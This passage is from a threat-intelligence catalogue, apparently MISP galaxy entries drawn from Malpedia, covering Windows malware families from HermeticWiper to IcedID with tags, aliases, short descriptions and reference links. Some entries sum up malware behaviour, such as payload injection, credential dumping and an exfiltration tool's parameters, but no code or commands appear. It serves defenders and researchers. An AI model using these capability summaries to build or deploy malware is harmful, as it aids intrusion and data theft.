https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwiper

https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html

https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat

https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine/

https://socradar.io/what-you-need-to-know-about-russian-cyber-escalation-in-ukraine/

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine

https://twitter.com/fr0gger_/status/1497121876870832128

https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya

https://www.zdnet.com/article/microsoft-finds-foxblade-malware-on-ukrainian-systems-removing-rt-from-windows-app-store/

https://twitter.com/Sebdraven/status/1496878431719473155

https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf

https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/

https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-057A_Destructive_Malware_Targeting_Organizations_in_Ukraine.pdf

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-hermeticwiper-partyticket

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/digging-into-hermeticwiper.html

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/defenders-blog-on-cyberattacks-targeting-ukraine.html

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf

https://blog.qualys.com/vulnerabilities-threat-research/2022/03/01/ukrainian-targets-hit-by-hermeticwiper-new-datawiper-malware

https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/

https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/

https://blogs.blackberry.com/en/2022/03/threat-thursday-hermeticwiper

https://www.mandiant.com/resources/information-operations-surrounding-ukraine

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/

https://unit42.paloaltonetworks.com/preparing-for-cyber-impact-russia-ukraine-crisis/

https://securityintelligence.com/posts/new-destructive-malware-cyber-attacks-ukraine/

https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia

https://therecord.media/second-data-wiper-attack-hits-ukraine-computer-networks/

https://blogs.vmware.com/networkvirtualization/2022/03/hermetic-malware-multi-component-threat-targeting-ukraine-organizations.html/

https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/

https://www.youtube.com/watch?v=sUlW45c9izU

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/

https://www.secureworks.com/blog/disruptive-hermeticwiper-attacks-targeting-ukrainian-organizations

https://www.brighttalk.com/webcast/15591/534324

https://eln0ty.github.io/malware%20analysis/HermeticWiper/

https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf

https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/

https://dgc.org/en/hermeticwiper-malware/

https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/

https://thehackernews.com/2022/02/new-wiper-malware-targeting-ukraine.html

https://www.deepinstinct.com/blog/hermeticwiper-malware-the-russian-ukrainian-cyber-war

https://www.englert.one/hermetic-wiper-reverse-code-engineering

https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war

https://www.bitdefender.com/blog/hotforsecurity/five-things-you-need-to-know-about-the-cyberwar-in-ukraine/

https://cloudsek.com/technical-analysis-of-the-hermetic-wiper-malware-used-to-target-ukraine/

https://thehackernews.com/2022/02/putin-warns-russian-critical.html

https://t3n.de/news/cyber-attacken-ukraine-wiper-malware-1454318/

https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/

https://learnsentinel.blog/2022/02/28/detecting-malware-kill-chains-with-defender-and-microsoft-sentinel/

https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/

https://community.riskiq.com/article/9f59cb85

https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks

https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/

https://marcoramilli.com/2022/03/01/diskkill-hermeticwiper-and-notpetya-dissimilarities/

https://elastic.github.io/security-research/intelligence/2022/03/01.hermeticwiper-targets-ukraine/article/

https://go.recordedfuture.com/hubfs/reports/mtp-2022-0302.pdf

https://blogs.microsoft.com/on-the-issues/2022/12/03/preparing-russian-cyber-offensive-ukraine/

https://blog.malwarebytes.com/threat-intelligence/2022/03/hermeticwiper-a-detailed-analysis-of-the-destructive-malware-that-targeted-ukraine/

https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works

https://cluster25.io/2022/02/24/ukraine-analysis-of-the-new-disk-wiping-malware/

https://www.youtube.com/watch?v=mrTdSdMMgnk

https://www.zscaler.com/blogs/security-research/hermeticwiper-resurgence-targeted-attacks-ukraine

https://yoroi.company/research/diskkill-hermeticwiper-a-disruptive-cyber-weapon-targeting-ukraines-critical-infrastructures/

https://www.cisa.gov/uscert/ncas/alerts/aa22-057a

https://brandefense.io/hermeticwiper-technical-analysis-report/

https://twitter.com/threatintel/status/1496578746014437376

https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html

https://securityboulevard.com/2022/03/isaacwiper-followed-hermeticwiper-attack-on-ukraine-orgs/

HerpesBot

The tag is: misp-galaxy:malpedia="HerpesBot"

HerpesBot is also known as:

Table 3671. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes

HesperBot

The tag is: misp-galaxy:malpedia="HesperBot"

HesperBot is also known as:

Table 3672. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hesperbot

HiAsm

The tag is: misp-galaxy:malpedia="HiAsm"

HiAsm is also known as:

Table 3674. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hiasm

https://fortiguard.fortinet.com/encyclopedia/virus/6488677

HIGHNOON

According to FireEye, HIGHNOON is a backdoor that may consist of multiple components. The components may include a loader, a DLL, and a rootkit. Both the loader and the DLL may be dropped together, but the rootkit may be embedded in the DLL. The HIGHNOON loader may be designed to run as a Windows service.

The tag is: misp-galaxy:malpedia="HIGHNOON"

HIGHNOON is also known as:

Table 3678. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.highnoon

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021

https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html

https://twitter.com/MrDanPerez/status/1159461995013378048

https://content.fireeye.com/apt-41/rpt-apt41/

HIGHNOON.BIN

The tag is: misp-galaxy:malpedia="HIGHNOON.BIN"

HIGHNOON.BIN is also known as:

Table 3679. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.highnoon_bin

https://content.fireeye.com/apt-41/rpt-apt41/

HIGHNOTE

The tag is: misp-galaxy:malpedia="HIGHNOTE"

HIGHNOTE is also known as:

  • ChyNode

Table 3680. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.highnote

https://twitter.com/bkMSFT/status/1153994428949749761

Himera Loader

The tag is: misp-galaxy:malpedia="Himera Loader"

Himera Loader is also known as:

Table 3685. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.himera_loader

https://twitter.com/James_inthe_box/status/1260191589789392898

Hive (Windows)

Hive is a strain of ransomware that was first discovered in June 2021. Hive was designed to be used by Ransomware-as-a-Service providers, enabling novice cyber-criminals to launch ransomware attacks on healthcare providers, energy providers, charities, and retailers across the globe. In 2022, its codebase was switched from Golang to Rust.

The tag is: misp-galaxy:malpedia="Hive (Windows)"

Hive (Windows) is also known as:

Table 3687. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hive

https://resources.prodaft.com/wazawaka-report

https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape

https://www.connectwise.com/resources/hive-profile

https://therecord.media/academics-publish-method-for-recovering-data-encrypted-by-the-hive-ransomware/

https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/

https://www.varonis.com/blog/hive-ransomware-analysis

https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html

https://www.microsoft.com/security/blog/2022/07/05/hive-ransomware-gets-upgrades-in-rust/

https://www.bleepingcomputer.com/news/security/hive-ransomware-uses-new-ipfuscation-trick-to-hide-payload/

https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again

https://unit42.paloaltonetworks.com/emerging-ransomware-groups/

https://yoroi.company/research/on-the-footsteps-of-hive-ransomware/

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf

https://securityaffairs.co/wordpress/128232/security/recover-files-hive-ransomware.html

https://labs.sentinelone.com/hive-attacks-analysis-of-the-human-operated-ransomware-targeting-healthcare/

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://arxiv.org/pdf/2202.08477.pdf

https://yoroi.company/wp-content/uploads/2022/07/Yoroi-On-The-Footsteps-of-Hive-Ransomware.pdf

https://www.netskope.com/blog/hive-ransomware-actively-targeting-hospitals

https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf?1651576098

https://therecord.media/hive-ransomware-shuts-down-california-health-care-organization/

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf

https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_hive_2021_v1.pdf

https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://securelist.com/modern-ransomware-groups-ttps/106824/

https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery

https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf

https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/

https://www.scmagazine.com/brief/breach/novel-obfuscation-leveraged-by-hive-ransomware

https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/

https://github.com/reecdeep/HiveV5_file_decryptor

https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/

https://github.com/rivitna/Malware/tree/main/Hive

https://lifars.com/2022/02/how-to-decrypt-the-files-encrypted-by-the-hive-ransomware/

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html

https://blog.group-ib.com/hive

https://www.ic3.gov/Media/News/2021/210825.pdf

Hi-Zor RAT

The tag is: misp-galaxy:malpedia="Hi-Zor RAT"

Hi-Zor RAT is also known as:

Table 3688. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hi_zor_rat

https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat

HLUX

The tag is: misp-galaxy:malpedia="HLUX"

HLUX is also known as:

Table 3689. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux

Holcus Installer (Adware)

Adware, tied to the eGobbler and Nephos7 campaigns.

The tag is: misp-galaxy:malpedia="Holcus Installer (Adware)"

Holcus Installer (Adware) is also known as:

Table 3690. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.holcus

https://blog.confiant.com/malvertising-made-in-china-f5081521b3f0

HOLERUN

The tag is: misp-galaxy:malpedia="HOLERUN"

HOLERUN is also known as:

Table 3691. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.holerun

https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated

homefry

A 64-bit Windows password dumper/cracker that has previously been used in conjunction with the AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and the malware version for each login session.

The tag is: misp-galaxy:malpedia="homefry"

homefry is also known as:

Table 3692. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry

https://www.secureworks.com/research/threat-profiles/bronze-mohawk

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

Hopscotch

Hopscotch is part of the Regin framework.

The tag is: misp-galaxy:malpedia="Hopscotch"

Hopscotch is also known as:

Table 3695. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hopscotch

https://www.youtube.com/watch?v=VnzP00DZlx4

HorusEyes RAT

Remote Access Tool written in VB.NET.

The tag is: misp-galaxy:malpedia="HorusEyes RAT"

HorusEyes RAT is also known as:

Table 3696. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.horuseyes

https://github.com/arsium/HorusEyesRat_Public

Horus Eyes RAT

Warsaw trojan is a new banking trojan based on the Horus Eyes RAT core engine.

The tag is: misp-galaxy:malpedia="Horus Eyes RAT"

Horus Eyes RAT is also known as:

Table 3697. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.horus_eyes_rat

https://seguranca-informatica.pt/the-clandestine-horus-eyes-rat-from-the-underground-to-criminals-arsenal/

HOTWAX

HOTWAX is a module that upon starting imports all necessary system API functions, and searches for a .CHM file. HOTWAX decrypts a payload using the Spritz algorithm with a hard-coded key and then searches the target process and attempts to inject the decrypted payload module from the CHM file into the address space of the target process.

The tag is: misp-galaxy:malpedia="HOTWAX"

HOTWAX is also known as:

Table 3699. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hotwax

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf

https://securelist.com/lazarus-under-the-hood/77908/

https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf

https://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html

https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/

https://raw.githubusercontent.com/eric-erki/APT_CyberCriminal_Campagin_Collections/master/2017/2017.05.30.Lazarus_Arisen/Group-IB_Lazarus.pdf

https://content.fireeye.com/apt/rpt-apt38

Houdini

Houdini is a VBS-based RAT dating back to 2013. In the past it was wrapped in an .exe, but in 2018 it started being spamvertised or downloaded by other malware directly as a .vbs file. In 2019, WSHRAT appeared, a JavaScript-based version of Houdini recoded under the name Kognito.

The tag is: misp-galaxy:malpedia="Houdini"

Houdini is also known as:

  • Hworm

  • Jenxcus

  • Kognito

  • Njw0rm

  • WSHRAT

  • dinihou

  • dunihi

Table 3700. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.houdini

https://cybersecurity.att.com/blogs/labs-research/alien-labs-2019-analysis-of-threat-groups-molerats-and-apt-c-37

https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/wsh_rat.md

https://www.youtube.com/watch?v=h3KLKCdMUUY

https://www.cadosecurity.com/post/threat-group-uses-voice-changing-software-in-espionage-attempt

https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html

https://isc.sans.edu/forums/diary/Houdini+is+Back+Delivered+Through+a+JavaScript+Dropper/28746/

https://blogs.360.cn/post/APT-C-44.html

https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape

https://lab52.io/blog/wirte-group-attacking-the-middle-east/

https://cofense.com/houdini-worm-transformed-new-phishing-attack/

https://threatpost.com/ta2541-apt-rats-aviation/178422/

https://www.youtube.com/watch?v=XDAiS6KBDOs

https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html

https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html

https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/

https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns

http://blogs.360.cn/post/analysis-of-apt-c-37.html

https://yoroi.company/research/threatening-within-budget-how-wsh-rat-is-abused-by-cyber-crooks/

https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/

https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/

https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/

https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated

http://blog.morphisec.com/hworm-houdini-aka-njrat

https://myonlinesecurity.co.uk/more-agenttesla-keylogger-and-nanocore-rat-in-one-bundle/

https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g

HtBot

The tag is: misp-galaxy:malpedia="HtBot"

HtBot is also known as:

Table 3701. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot

htpRAT

The tag is: misp-galaxy:malpedia="htpRAT"

htpRAT is also known as:

Table 3702. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.htprat

https://www.riskiq.com/blog/labs/htprat/

HTTPSnoop

Cisco Talos states that HTTPSnoop is a simple, yet effective, backdoor that consists of novel techniques to interface with Windows HTTP kernel drivers and devices to listen to incoming requests for specific HTTP(S) URLs and execute that content on the infected endpoint.

The tag is: misp-galaxy:malpedia="HTTPSnoop"

HTTPSnoop is also known as:

Table 3706. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.httpsnoop

https://blog.talosintelligence.com/introducing-shrouded-snooper/

HTTP(S) uploader

The HTTP(S) uploader is a Lazarus tool responsible for data exfiltration, by using the HTTP or HTTPS protocols.

It accepts up to 10 command line parameters: a 29-byte decryption key, a C&C for data exfiltration, the name of a local RAR split volume, the name of the multivolume archive on the server side, the size of a RAR split (max 200,000 kB), the starting index of a split, the ending index of a split, and the switch -p with a proxy IP address and port.

The tag is: misp-galaxy:malpedia="HTTP(S) uploader"

HTTP(S) uploader is also known as:

Table 3707. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.httpsuploader

https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/

https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf

https://securelist.com/lazarus-threatneedle/100803/

Hunter Stealer

The tag is: misp-galaxy:malpedia="Hunter Stealer"

Hunter Stealer is also known as:

Table 3710. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hunter

https://twitter.com/3xp0rtblog/status/1324800226381758471

HuskLoader

The tag is: misp-galaxy:malpedia="HuskLoader"

HuskLoader is also known as:

Table 3712. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.huskloader

https://twitter.com/SethKingHi/status/1612377098777133057

Hussar

The tag is: misp-galaxy:malpedia="Hussar"

Hussar is also known as:

Table 3713. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hussar

https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/

HxDef

The tag is: misp-galaxy:malpedia="HxDef"

HxDef is also known as:

  • HacDef

  • HackDef

  • HackerDefender

Table 3714. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hxdef

https://de.securelist.com/malware-entwicklung-im-ersten-halbjahr-2007/59574/

HyperBro

HyperBro is a RAT that has been observed targeting primarily the gambling industry, though it has been spotted elsewhere as well. The malware typically consists of three or more components:

  • a genuine loader, typically with a signed certificate

  • a malicious DLL loader, loaded by the former component via DLL hijacking

  • an encrypted and compressed blob that decrypts to a PE-based payload with its C2 information hardcoded within

The tag is: misp-galaxy:malpedia="HyperBro"

HyperBro is also known as:

Table 3715. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro

https://www.bleepingcomputer.com/news/security/german-govt-warns-of-apt27-hackers-backdooring-business-networks/

https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf

https://cyware.com/news/apt27-group-targets-german-organizations-with-hyperbro-2c43b7cf/

https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/

https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx

https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel

https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html

https://team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/

https://www.intrinsec.com/apt27-analysis/

https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf

https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/iron-tiger-compromises-chat-application-mimi,-targets-windows,-mac,-and-linux-users/IOCs-IronTiger-compromises-chat-application-mimi-targets-windows-mac-linux-users.txt

https://www.trendmicro.com/en_us/research/22/h/irontiger-compromises-chat-app-Mimi-targets-windows-mac-linux-users.html

https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop

https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia

https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/

https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html

http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/

https://securelist.com/luckymouse-hits-national-data-center/86083/

https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf?blob=publicationFile&v=10

https://www.mandiant.com/resources/blog/chinese-espionage-tactics

https://www.secureworks.com/research/threat-profiles/bronze-union

https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/

https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/

https://blog.team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/

https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf

https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox

HYPERSCRAPE

The tag is: misp-galaxy:malpedia="HYPERSCRAPE"

HYPERSCRAPE is also known as:

Table 3716. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperscrape

https://blog.google/threat-analysis-group/new-iranian-apt-data-extraction-tool/

HyperSSL (Windows)

Sideloader used by EmissaryPanda

The tag is: misp-galaxy:malpedia="HyperSSL (Windows)"

HyperSSL (Windows) is also known as:

  • FOCUSFJORD

  • Soldier

  • Sysupdate

Table 3717. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperssl

https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf

https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf

https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html

https://norfolkinfosec.com/emissary-panda-dll-backdoor/

https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Article-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf

https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf

https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/

https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Slides-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf

https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx

https://www.mandiant.com/resources/blog/chinese-espionage-tactics

https://twitter.com/ESETresearch/status/1594937054303236096

https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel

https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html

https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html

HZ RAT

The tag is: misp-galaxy:malpedia="HZ RAT"

HZ RAT is also known as:

Table 3718. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hzrat

https://medium.com/@DCSO_CyTec/hz-rat-goes-china-506854c5f2e2

Icarus

Icarus is a modular stealer software, written in .NET. One module is the open source r77 rootkit.

The tag is: misp-galaxy:malpedia="Icarus"

Icarus is also known as:

Table 3719. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.icarus

https://twitter.com/struppigel/status/1566685309093511170

IcedID

According to Proofpoint, IcedID (aka BokBot) is a malware originally classified as a banking malware and was first observed in 2017. It also acts as a loader for other malware, including ransomware. The well-known IcedID version consists of an initial loader which contacts a Loader C2 server, downloads the standard DLL Loader, which then delivers the standard IcedID Bot. IcedID is developed and operated by the actor named LUNAR SPIDER.

As previously published, historically there has been just one version of IcedID that has remained constant since 2017.

  • In November 2022, Proofpoint researchers observed the first new variant of IcedID, which Proofpoint dubbed 'IcedID Lite', distributed as a follow-on payload in a TA542 Emotet campaign. It was dropped by the Emotet malware soon after the actor returned to the e-crime landscape after a nearly four-month break.

  • The IcedID Lite Loader observed in November 2022 contains a static URL to download a 'Bot Pack' file with a static name (botpack.dat), which results in the IcedID Lite DLL Loader and then delivers the Forked version of IcedID Bot, leaving out the webinjects and backconnect functionality that would typically be used for banking fraud.

  • Starting in February 2023, Proofpoint observed the new Forked variant of IcedID. This variant was distributed by TA581 and one unattributed threat activity cluster, which acted as initial access facilitators. The campaigns used a variety of email attachments, such as Microsoft OneNote attachments and the somewhat rare .URL attachments, which led to the Forked variant of IcedID.

The tag is: misp-galaxy:malpedia="IcedID"

IcedID is also known as:

  • BokBot

  • IceID

Table 3720. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike

https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/

https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol

https://www.youtube.com/watch?v=oZ4bwnjcXWg

https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://kienmanowar.wordpress.com/2020/08/16/manual-unpacking-icedid-write-up/

https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/

https://www.fortinet.com/blog/threat-research/spoofed-invoice-drops-iced-id

https://twitter.com/embee_research/status/1592067841154756610?s=20

https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/

https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf

https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/

https://research.loginsoft.com/threat-research/icedid-malware-traversing-through-its-various-incarnations/

https://www.socinvestigation.com/icedid-banking-trojan-returns-with-new-ttps-detection-response/

https://matth.dmz42.org/posts/2022/automatically-unpacking-icedid-stage1-with-angr/

https://isc.sans.edu/diary/28636

